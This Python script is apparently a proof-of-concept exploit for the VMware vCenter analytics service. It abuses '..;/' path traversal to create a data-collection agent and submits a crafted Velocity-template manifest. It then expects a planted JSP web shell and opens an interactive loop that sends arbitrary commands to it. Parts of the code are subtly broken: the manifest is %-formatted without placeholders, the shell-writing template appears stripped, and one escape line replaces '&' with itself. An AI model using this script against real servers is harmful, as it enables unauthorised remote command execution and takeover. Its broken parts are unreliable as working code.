import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))
def escape(_str):
    _str = _str.replace("&", "&")
    _str = _str.replace("<", "&lt;")
    _str = _str.replace(">", "&gt;")
    _str = _str.replace("\"", "&quot;")
    return _str

def run_shell(url, pwd, cmd):
    burp0_url = url 
    burp0_headers = {"User-Agent": "Mozilla/5.0", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
    burp0_data = {pwd: cmd.strip()}
    ct = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False).content
    ct = ct.split('<pre>')[1].split('</pre>')[0]
    return ct

def createAgent(url, agent_name):
    burp0_url = url + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c="+agent_name+"&_i=test2"
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"}
    burp0_json={"manifestSpec":{}, "objectType": "a2", "collectionTriggerDataNeeded":  True,"deploymentDataNeeded":True, "resultNeeded": True, "signalCollectionCompleted":True, "localManifestPath": "a7","localPayloadPath": "a8","localObfuscationMapPath": "a9"  }
    requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)

pwd = id_generator(6)
agent_name = id_generator(6)
shell_name = id_generator(6)+".jsp"
manifestData = """<manifest recommendedPageSize="500">
   <request>
      <query name="vir:VCenter">
         <constraint>
            <targetType>ServiceInstance</targetType>
         </constraint>
         <propertySpec>
            <propertyNames>content.about.instanceUuid</propertyNames>
            <propertyNames>content.about.osType</propertyNames>
            <propertyNames>content.about.build</propertyNames>
            <propertyNames>content.about.version</propertyNames>
         </propertySpec>
      </query>
   </request>
   <cdfMapping>
      <indepedentResultsMapping>
         <resultSetMappings>
            <entry>
               <key>vir:VCenter</key>
               <value>
                  <value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping">
                     <resourceItemToJsonLdMapping>
                        <forType>ServiceInstance</forType>
                     <mappingCode><![CDATA[
                        
                        #set($modelKey = $LOCAL-resourceItem.resourceItem.getKey())##
                        #set($objectId = "vim.ServiceInstance:$modelKey.value:$modelKey.serverGuid")##
                        #set($obj = $LOCAL-cdf20Result.newObject("vim.ServiceInstance", $objectId))##
                        $obj.addProperty("OSTYPE", "VMware can't steal this PoC")##
                        $obj.addProperty("BUILD", $content-about-build)##
                        $obj.addProperty("VERSION", $content-about-version)##]]>
                     </mappingCode>
                     </resourceItemToJsonLdMapping>
                  </value>
               </value>
            </entry>
         </resultSetMappings>
      </indepedentResultsMapping>
   </cdfMapping>
   <requestSchedules>
      <schedule interval="1h">
         <queries>
            <query>vir:VCenter</query>
         </queries>
      </schedule>
   </requestSchedules>
</manifest>""" % (shell_name, pwd, pwd)

target = sys.argv[1]
print("Target: "+ target)
print("Creating Agent (of SHIELD) ...")
createAgent(target, agent_name)
print("Collecting Agent (of SHIELD) ...")
burp0_url = target+"/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c="+agent_name+"&_i=test2"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"}
burp0_json={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"}
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, proxies={"https":"http://127.0.0.1:8080"})
print("Success!")
print("Shell: " + target+"/idm/..;/"+shell_name)
print("Pwd: "+ pwd)
print("Launching pseudo shell ...")
while True:
    cmd = raw_input("/remote_shell/# ").strip()
    if(cmd =="quit"):
        sys.exit(-1)
    output = run_shell(target+"/idm/..;/"+shell_name,pwd, cmd)
    time.sleep(1)
    print(output)